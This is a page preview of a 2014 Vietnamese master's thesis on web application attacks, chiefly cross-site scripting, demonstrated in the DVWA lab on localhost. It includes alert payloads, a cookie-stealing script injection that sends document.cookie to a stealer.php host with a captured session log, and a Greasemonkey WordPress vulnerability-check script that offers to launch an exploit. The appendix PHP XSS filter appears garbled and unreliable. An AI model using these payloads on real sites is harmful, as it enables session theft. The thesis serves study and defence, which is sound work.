Khảo sát một số tấn công ứng dụng web phổ biến và xây dựng phần mềm công cụ hỗ trợ tấn công liên trang (cross site scripting)

59 12 0
Khảo sát một số tấn công ứng dụng web phổ biến và xây dựng phần mềm công cụ hỗ trợ tấn công liên trang (cross site scripting)

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC BÁCH KHOA HÀ NỘI Nguyễn Hoàng Minh Quang KHẢO SÁT MỘT SỐ TẤN CÔNG ỨNG DỤNG WEB PHỔ BIẾN VÀ XÂY DỰNG PHẦN MỀM CÔNG CỤ HỖ TRỢ TẤN CÔNG LIÊN TRANG (CROSS-SITE SCRIPTING) Chuyên ngành : Công nghệ thông tin LUẬN VĂN THẠC SĨ KỸ THUẬT NGƯỜI HƯỚNG DẪN KHOA HỌC TS Nguyễn Khanh Văn Hà Nội – Năm 2014 LỜI CẢM ƠN Tôi xin chân thành tri ân Thầy Nguyễn Khanh Văn – Viện công nghệ thông tin Truyền thông - Đại học Bách Khoa Hà Nội tận tình hướng dẫn giúp đỡ tơi hồn thành luận văn Xin chân thành cảm ơn Quý Thầy Cô, nhân viên thuộc Viện Công nghệ thông tin Truyền Thông, Viện Sau đại học – Trường Đại học Bách Khoa Hà Nội quan tâm giúp đỡ tận tình q trình nghiên cứu hồn thành luận văn Xin chân thành cảm ơn đồng nghiệp, cảm ơn bạn học viên lớp Cao học Công nghệ thông tin khóa 2012A học Nha Trang động viên, giúp đỡ suốt q trình học tập hồn thành luận văn Cuối xin cảm ơn người thân gia đình bạn bè ln tạo điều kiện thuận lợi nhất, chỗ dựa mặt tinh thần vững để tác giả hoàn thành nhiệm vụ Hà Nội, tháng năm 2014 Nguyễn Hồng Minh Quang LỜI CAM ĐOAN Tơi xin cam đoan cơng trình nghiên cứu tơi hướng dẫn TS Nguyễn Khanh Văn Các số liệu, kết nêu luận văn trung thực chưa công bố cơng trình khác Hà Nội, ngày 20 tháng năm 2014 Nguyễn Hoàng Minh Quang MỤC LỤC MỤC LỤC DANH MỤC HÌNH ẢNH DANH MỤC BẢNG DANH MỤC CÁC TỪ VIẾT TẮT Phần mở đầu 1.Lý chọn đề tài 2.Mục đích nghiên cứu đề tài 3.Phương pháp nghiên cứu .7 4.Ý nghĩa thực tiễn luận văn Cấu trúc luận văn CHƢƠNG TÔNG QUAN ỨNG DỤNG WEB VÀ BẢO MẬT ỨNG DỤNG WEB 1.1 Website 1.2 Kiến trúc Web 2.0 .8 1.2.1.Mơ hình ứng dụng Web .11 1.2.1.1 Các Web Server 11 1.2.1.2 Ứng dụng web: 11 1.2.1.3 Lưu trữ liêu 12 1.3 Các vấn đề bảo mật Web 12 1.4 Các công ứng dụng web phổ biến 13 1.4.1 Tấn công SQL .13 1.4.2 Tấn Công XSS 13 4.3 Tấn công DOS/DDOS 14 CHƢƠNG TỔNG QUAN VỀ XSS 15 2.1 Khái niệm XSS 15 2.1.1 STORED XSS 15 2.1.2 REFLECTED XSS 17 2.1.3 DOM-Based XSS 17 2.2 Các phương pháp công XSS 18 2.2.1 Kỹ thuật cơng phía Server 19 2.2.2 Các kỹ thuật cơng phía Client 20 2.2.2.1 REFLECTED XSS 20 2.2.2.2 Encoding URL XSS 20 2.2.2.3 Phương pháp công Dom-Based XSS 21 2.3 Các cách phòng chống XSS 22 2.3.1 Phịng chống cơng XSS từ phía người dùng 22 2.3.2 Từ phía nhà phát triển ứng dụng 24 CHƢƠNG 3: GIỚI THIỆU PHƢƠNG PHÁP PHÁT HIỆN SÂU XSS PHÍA CLIENT SIDE CỦA TÁC GIẢ FANGQI SUN, LIANG XU VÀ ZHENDONG SU 26 Trang 3.1 Đặt vấn đề 26 3.2 Lý thuyết liên quan đến Sâu XSS 26 3.2.1 Kiến trúc DOM 26 3.2.2 Công nghệ AJAX 28 3.2.3 Các bước lây lan sâu XSS 28 3.3 Tiếp cận phương pháp phát sâu 29 3.4 Mô tả chi tiết thuật toán phát sâu 31 3.5 Cài đặt .35 3.6 Khảo sát số loại sâu XSS 36 3.7 Đối chiếu số phương pháp khác: .39 3.7.1 Phát sâu 39 3.7.2 Bảo vệ phía máy người dùng 39 3.7.3 Phân tích phía Server-Side : 40 3.8 Kết luận 41 CHƢƠNG CÀI ĐẶT VÀ THỰC NGHIỆM 42 4.1 Cài đặt môi trường : .42 4.2 Thử nghiệm: 42 4.3 Demo đánh cắp Cookie thông qua công XSS : 45 KẾT LUẬN VÀ HƢỚNG PHÁT TRIỂN 47 PHỤ LỤC 49 Trang DANH MỤC HÌNH ẢNH Hình 1.1 Kiến trúc Web 2.0 Hình 1.2 Mơ hình phân lớp Web 2.0 10 Hình 1.3 Kiến trúc ứng dụng Web 12 Hình 2.1 Hình ảnh thể cách công STORED XSS .16 Hình 2.2 Hình ảnh cơng REFLECTED XSS 17 Hình 2.3 Các bước công dạng DOM-BASE XSS .18 Hình 2.4 Hình ảnh cơng STORE XSS .19 Hình 2.5 Kết hiển thị sau bị công STORE XSS .20 Hình 3.1 Kiến trúc phát sâu XSS máy client .30 Hình 3.2 Sơ đồ giao diện hợp tác .34 Hình 4.1 Control Panel XAMPP .42 Hình 4.2 Giao diện DVWA .43 Hình 4.3 Demo cơng XSS Reflected 43 Hình 4.4 Kết Demo công XSS Reflected .44 Hình 4.5 Demo cơng XSS Stored .44 Hình 4.6 Kết Demo công XSS Stored 45 Hình 4.7 Demo lấy cắp cookie thông qua công XSS 46 Trang DANH MỤC BẢNG Bảng 3.3.1 Thống kê sâu XSS thực tế 37 Trang DANH MỤC CÁC TỪ VIẾT TẮT XSS : Cross Site Scripting Trang Phần mở đầu Ngày mà Internet trở thành thứ thiếu sống ngày người vấn đề an ninh mạng lại đặt cách thiết Một thực tế cho thấy ngày giới có hàng triệu trang web bị công, tài khoản mật nhiều người dùng bị đánh cắp Các công nghệ ứng dụng đặn đời phải thừa nhận khơng có biện pháp hữu hiệu ngăn chặn hồn tồn công mạng ứng dụng internet Một cơng phổ biến công XSS Theo xếp hạng tổ chức OWASP xếp sau cơng SQL INJECTION Vì luận văn nghiên cứu cách cơng phòng chống XSS nhằm hạn chế hậu đem lại 1.Lý chọn đề tài Trong thời đại CNTT bùng nổ, giao dịch thông qua Internet nói chung, dịch vụ Web nói riêng Các dịch vụ đem lại nhiều tiện ích cho người, giúp người tiết kiệm nhiều thời gian bên cạnh tiềm ẩn nhiều mối nguy hại mà người chưa biết Lợi dụng lổ hỏng bảo mật SQL Injection, Cross Site Scripting (XSS) hacker lấy trộm thơng tin nhân, gây hại đến người dùng … Với nguy hiểm phổ biến công XSS nên chọn đề tài nhằm nghiên cứu xây dựng cơng cụ để hỗ trợ phịng chống cơng XSS 2.Mục đích nghiên cứu đề tài  Tìm hiểu tổng quan vấn đề bảo mật ứng dụng web  Tìm hiều sâu loại hình cơng Cross-site scripting (XSS)  Từ đề xuất phịng chống loại hình cơng cách hiệu Trang 3.Phƣơng pháp nghiên cứu  Tìm hiểu nghiên cứu tài liệu  Thực nghiệm máy chủ cục bộ, sử dụng tool hỗ trợ 4.Ý nghĩa thực tiễn luận văn Nghiên cứu loại hình cơng xem “Godfather attack” để góp phần ngăn chặn giảm thiểu tác hại Đồng thời có nhận thức đắn triển khai ứng dụng web viện quản trị trang web Cấu trúc luận văn Chương 1: Tìm hiểu tổng quan web, ứng dụng web vấn đề bảo mật web Chương 2: Tìm hiểu XSS kỹ thuật cơng XSS Chương 3: Nêu phương pháp phát sâu XSS (XSS Worm) máy người dùng tác giả Fangqi Sun, Liang Xu, and Zhendong Su Chương : Cài đặt thực nghiệm Trang CHƢƠNG CÀI ĐẶT VÀ THỰC NGHIỆM 4.1 Cài đặt môi trƣờng :  Hệ điều hành WIN  Trình duyệt IE 9, Fire Fox 32.0  XAMPP v3.2.1 Hình 4.1 Control Panel XAMPP 4.2 Thử nghiệm: Khi nghiên cứu công ứng dụng Web ta cần có mơi trường thử nghiệm Ở xin giới thiệu môi trường thử nghiệm sau : DVWA (Damn Vulnerable Web Application) : framework xây dựng sẵn lỗ hổng bảo mật theo top 10 điểm yếu bảo mật Web OWASP Nó đáp ứng nhu cầu học tập thử nghiệm nhiều người Từ người tìm hiều người có trình độ định Tùy theo trình độ người mà ta chọn mức low đến high thử nghiệm Dưới giao diện Trang 42 Hình 4.2 Giao diện DVWA Chèn đoạn mã alert("XSS") với dạng công XSS Reflected Hình 4.3 Demo cơng XSS Reflected Trang 43 Kết hiển thị thông báo XSS lên hình Hình 4.4 Kết Demo cơng XSS Reflected Chèn đoạn mã alert("XSS") với dạng công XSS Stored Hình 4.5 Demo cơng XSS Stored Trang 44 Kết đoạn mã thực thi hiển thị lên hình Hình 4.6 Kết Demo cơng XSS Stored 4.3 Demo đánh cắp Cookie thông qua công XSS : Thông thường ta đăng nhập vào trang web thơng tin người dùng lưu vào cookie máy người dùng Cách công để lấy cookie máy người dùng sau: B1: Kẻ công tạo file stealer.php log.txt File stealer.php hình bên dưới, file có nhiệm vụ lấy thơng tin cookie lưu file log.txt Trang 45 B2: Lưu trữ file host B3: Tìm trang bị dính lỗi XSS chèn đường link dẫn tới file stealer.php B4: Khi có truy cập vào đường link thơng tin cookie máy họ bị lấy cắp lưu file log.txt Ta sử dụng Add on Fire Fox Cookie Manager để log in vào trang web với cookie vừa lấy mà đăng nhập Một số hình ảnh demo: Tải file vào địa “http://127.0.0.1/” Chèn đoạn mã sau vào form Submit DVWA: document.location="http://127.0.0.1/stealer.php?c=" + document.cookie Hình 4.7 Demo lấy cắp cookie thông qua công XSS Khi nhấn submit đoạn mã thực thi lấy thông tin cookie lưu vào file log.txt Cookie: security=low; PHPSESSID=ja2m953tqt9ftohlfs4n27e906 IP: 127.0.0.1 Date: 15 September, 2014, 8:38 am Referer: http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=%3Cscript %3E+document.location%3D%22http%3A%2F%2F127.0.0.1%2Fstealer.php%3Fc%3D%22+ %2B+document.cookie+%3C%2Fscript%3E Trang 46 KẾT LUẬN VÀ HƢỚNG PHÁT TRIỂN Kết đạt đƣợc :  Về mặt nghiên cứu : Đã tìm hiểu cách tổng quan công XSS Hiểu phân biệt loại cơng XSS Tìm hiểu số kỹ thuật cơng XSS phổ biến Tìm hiểu phương pháp phát xâu XSS máy client  Về mặt thực nghiệm : Đã cài đặt chạy thực nghiệm số công phần mềm giả lập Demo phương pháp lấy cookie phương pháp công XSS  Hạn chế đề tài : Vì thời gian có hạn nên đề tài tìm hiểu số kỹ thuật phổ biến Còn nhiều nhiều kỹ thuật công dựa lỗ hỏng XSS chưa nêu đề tài  Hƣớng phát triển : Nghiên cứu cách sâu rộng kỹ thuật công XSS Xây dựng phần mềm phát sâu XSS máy client Trang 47 Tài liệu tham khảo Tiếng việt [1] Trần Đình Ngọc, Kỹ thuật cơng XSS, Học viện cơng nghệ bưu viễn thơng [2] Nguyễn Văn Q, Nguyễn Ngọc Liệu, Tìm hiểu XSS cách cơng phịng thủ, Luận văn thạc sỹ Tiếng Anh [3] Billy Hoffman and Bryan Sullivan, (2008), Ajax security, Pearson Education [4] Chris Snyder and Michael Southwell, (2005), Pro PHP Security, Apress [5] Dafydd Stuttard, Marcus Pinto, (2008), The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws, Wiley Publishing [6] Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D Petkov, Anton Rager, Seth Fogie, (2007), XSS Attacks Cross Site Scripting Exploits and Defense, Syngress Publishing [7] Michael Cross, Steven Kapinos, Igor Muttik PhD, Haroon Meer, Steve Palmer, Petko “pdp” D Petkov, Roelof Temmingh, (2007),Web Application Vulnerabilities Detect, Exploit, Prevent, Syngress Publishing [8] Rich Cannings, Himanshu Dwivedi, Zane Lackey Hacking, (2008), Exposed Web 2.0: Wed 2.0 Security Secrets And Solutions, McGraw-Hill [9] Fangqi Sun, Liang Xu, and Zhendong Su, “Client-Side Detection of XSS Worms by Monitoring Payload Propagation”, Department of Computer Science University of California, Davis Nguồn Internet [10] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [11] http://www.acunetix.com/blog/web-security-zone/preventing-xss-attacks/ [12] http://www.veracode.com/security/xss Trang 48 PHỤ LỤC Phụ lục 1: Hàm PHP kiểm tra lạm lỗi XSS code : function removeXSS($val) { $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); $search = 'abcdefghijklmnopqrstuvwxyz'; $search = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $search = '1234567890!@#$%^&*()'; $search = '~`";:?+/={}[]-_|\'\\'; for ($i = 0; $i < strlen($search); $i++) { $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); } $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); $ra = array_merge($ra1, $ra2); $found = true; while ($found == true) { $val_before = $val; for ($i = 0; $i < sizeof($ra); $i++) { $pattern = '/'; for ($j = 0; $j < strlen($ra[$i]); $j++) { if ($j > 0) { $pattern = '('; $pattern = '(&#[xX]0{0,8}([9ab]);)'; $pattern = '|'; $pattern = '|(�{0,8}([9|10|13]);)'; $pattern = ')*'; } $pattern = $ra[$i][$j]; } $pattern = '/i'; $replacement = substr($ra[$i], 0, 2).''.substr($ra[$i], 2); $val = preg_replace($pattern, $replacement, $val); if ($val_before == $val) { $found = false; } } } return $val; } Trang 49 Phụ lục 2: Giới thiệu số công cụ hỗ trợ cho việc tìm hiểu nghiên cứu I Giới thiệu cơng cụ Firebug Firebug công cụ phổ biến cho người lập trình web Firebug giúp bạn chỉnh sửa, gỡ lỗi, xem CSS, HTML & JavaScript trang web Là addon Firefox Firebug có thểhoạt động trình duyệt khác (Firebug Lite) 1.Cài đặt: Mở Firefox Nhắp menu Tools >> Add-ons Nhắp link Browse all Add-on hộp thoại (hình dưới) Đợi chút , trang web Bạn nhắp Web Development (hình dưới) Trang 50 Đợi chút cho trang web ra, nhắp Firebug cột (hình dưới) Đợi chút cho trang web ra, nhắp Add to Firefox (hình dưới) Trang 51 Khi cài xong nhắp nút Restart Firefox Cách sử dụng Firebug: Mở Firefox, vào trang web đó, ví dụ http://vnexpress.net Vào menu View >> chọn FireBug Nhắp nút Inspect (nút toolbar FireBug) nhắp đối tượng muốn quan sát Các tabs mặc định Cách tốt để học Firebug sử dụng Tuy nhiên tốt trước sử dụng bạn hiểu qua chút Console Tab Console tab giúp bạn tìm kiếm thông tin chi tiết lỗi JavaScript, CSS XML Bạn kiểm tra tất thông tin với chức logging (trên website bạn) Tab cho phép bạn thực mã JavaScript trình duyệt (Các thơng tin trang Firebug: Quickly Find Errors, Execute JavaScript on the fly, Logging for JavaScript) HTML Tab Nếu bạn biết HTML hẳn bạn nói mã HTML dễ Đúng vậy, bạn phát triển trang web lớn phức tạp thật khó xác định Trang 52 phần mã HTML cần điều chỉnh/ thay đổi Với tab HTML, bạn tìm kiếm theo từ khóa "inspect" phần trang web Bạn check thơng tin quan trọng CSS layout, margins, borders, padding, kích thước (Các thông tin trang Firebug: Inspect and edit HTML, Visualize CSS metrics) CSS Tab CSS tab giúp bạn inspect sửa CSS trình duyệt Bạn load file CSS vào trang bạn xem Một công cụ chỉnh sửa CSS đơn giản, mạnh mẽ Bạn xem thay đổi trình duyệt (Các thơng tin trang Firebug: Tweak CSS to perfection) Script Tab Script tab công cụ giúp gỡ lỗi JavaScript (Các thông tin trang Firebug: Debug and profile JavaScript) DOM Tab Firebug giúp bạn nhanh chóng tìm đối tượng DOM (Document Object Model) tab bạn sửa đổi DOM tab công cụ tuyệt vời giúp bạn tìm hàm javascript để gỡ lỗi (Các thông tin trang Firebug: Explore the DOM) Net Tab Net tab cung cấp chi tiết tất thông tin request từ broswer response từ trang bạn xem (Các thông tin trang Firebug: Monitor network activity) Extensions Firebug cung cấp API cho phép nhà phát triển đóng góp thêm tính Dưới danh sách số extensions:  FirePHP,FireQuery : dành riêng cho việc sử dụng jQuery  Firecookie : bạn dùng firecookie để tạo cookie mới, xóa cookies cũ, xem danh sách cookies Trang 53  YSlow : Yslow kiểm tra trang web đưa gợi ý thay đổi để giúp trang web chạy nhanh  Page Speed : Tương tự YSlow, Page Speed thực nhiều kiểm tra trang web bạn đưa gợi ý giúp trang web chạy nhanh  Pixel Perfect : Nếu bạn làm việc cắt HTML & CSS cơng cụ khơng thể thiếu Addon giúp bạn so sánh khác pixel cắt HTML file thiết kế II Giới thiệu cơng cụ Grease Monkey : Hình 4.1 Logo Grease Monkey Add-on cho phép quản lý chạy đoạn script Firefox Khi mà add-on Firefox bất lực, lúc mà GreaseMonkey "Tỏa sáng" Nhờ có linh hoạt script, GreaseMonkey làm việc tưởng chừng "không thể" Cũng Firefox trở nên nhàm chán thiếu Add-on, sức mạnh thật GreaseMonkey từ đoạn script Một số ứng dụng như: Facebook Purity, TinyURL Decoder, Grease Lightbox, Google FX, Download Video từ Youtube Như nói đặc trưng Grease Monkey đoạn script người dùng tạo ra, sức mạnh yếu điểm để hacker “lành nghề” khai thác cơng trình duyệt người dùng Cài đặt: Vào trang www.addons.mozilla.org, search Grease Monkey Click chọn sau chọn Install now Trang 54 Restart Firefox Cách sử dụng : Để mở Grease Monkey làm theo hai cách: Tools -> Grease Monkey -> Manage user Script right-click lên biểu tượng khỉ statusbar chọn Manage user Script Đây giao diện làm việc chương trình Trong đó, bên trái hộp thoại script cài đặt, bên phải thông tin script URL liên quan khơng liên quan Tạo install script: Ví dụ: Tạo script làm thay đổi tiêu đề trang user tới thành Hello World! var h1s = document.body.getElementsByTagName('h1'); for (var i = 0; i < h1s.length; i++) h1s[i].innerHTML = 'Hello World!'; Lưu file thành hellowolrd.user.js Có hai cách tạo file user script: tạo trực tiếp browser tạo theo trình tự: Tools -> Grease Monkey -> Create Script Sau tạo xong file script, copy code từ file helloworld.user.js vào trang web mã hóa/giải mã Encode, sau thêm vào phía trước link vừa tạo đoạn sau: data:text/javascript;charset=utf-8, Và thêm vào cuối đoạn khác: //.user.js Sau copy paste vào addressbar -> Enter, trình duyệt hỏi lại việc installation, xác nhận install script Done Sau tìm hiểu cách dùng ta áp dụng Grease Monkey vào việc phát lỗ hổng bảo mật hay lỗi XSS website như: PstInterpreter XSS Asistant Một ví dụ cụ thể chức phát lỗ hổng Wordpress blogging software: var link = null; var links = document.getElementsByTagName('link'); if (!links) return; // find the blog feed for (var i = 0; i < links.length; i++) if (links[i].type == 'application/rss+xml') {link = links[i];break;} // if a feed is found check whether it is Wordpress 2.0.6 Trang 55 XSS worm Propagation method Triggering method Samy Worm XHR javascript: URIs Xanga XHR javascript: URIs Yamanner XHR onload event handler SpaceFlash XHR javascript: URIs innerHTML MyYearBook form submission src attribute Gaia XHR U-Dominion XHR src attribute src attribute Orkut XHR Hi5 form submission -moz-binding / expression Justin.tv XHR src attribute Twitter XHR src attribute / expression Payload location Release date DOM DOM server URI link DOM URI link URI link URI link URI link URI link URI link Oct 2005 Dec 2005 Jun 2006 Jul 2006 Jul 2006 Jan 2007 Jan 2007 Dec 2007 Dec 2007 Jun 2008 Apr 2009 if (link)GM_xmlhttpRequest({ method: 'GET', url: link.href,onload: function (response) {var r = new RegExp('wordpress/2.0.6', 'gi'); if (r.exec(response.responseText)) // vulnerable version is detected, ask for confirmation to run the exploit if (confirm('This blog is vulnerable to the Wordpress 2.0.6 Remote SQL Injection Do you want to exploit?')) // this is where the exploit should be placed alert('exploit in action');}}); Trang 56 ... gần 75% công mạng thực mức ứng dụng Web 1.4 Các công ứng dụng web phổ biến 1.4.1 Tấn công SQL SQL injection kỹ thuật cho phép kẻ công lợi dụng lỗ hổng việc kiểm tra liệu đầu vào ứng dụng web thông... thiệu số công nghệ lớp để trao quyền cho mạng tảng hỗ trợ framework cho tương tác ứng dụng 1.2.1.Mơ hình ứng dụng Web Một ứng dụng web chia thành thành phần Các thành phần máy chủ web, nội dung ứng. .. CHƢƠNG TÔNG QUAN ỨNG DỤNG WEB VÀ BẢO MẬT ỨNG DỤNG WEB 1.1 Website 1.2 Kiến trúc Web 2.0 .8 1.2.1.Mơ hình ứng dụng Web .11 1.2.1.1 Các Web Server

Ngày đăng: 17/02/2022, 19:30

Mục lục

    TÀI LIỆU THAM KHẢO

Tài liệu cùng người dùng

Tài liệu liên quan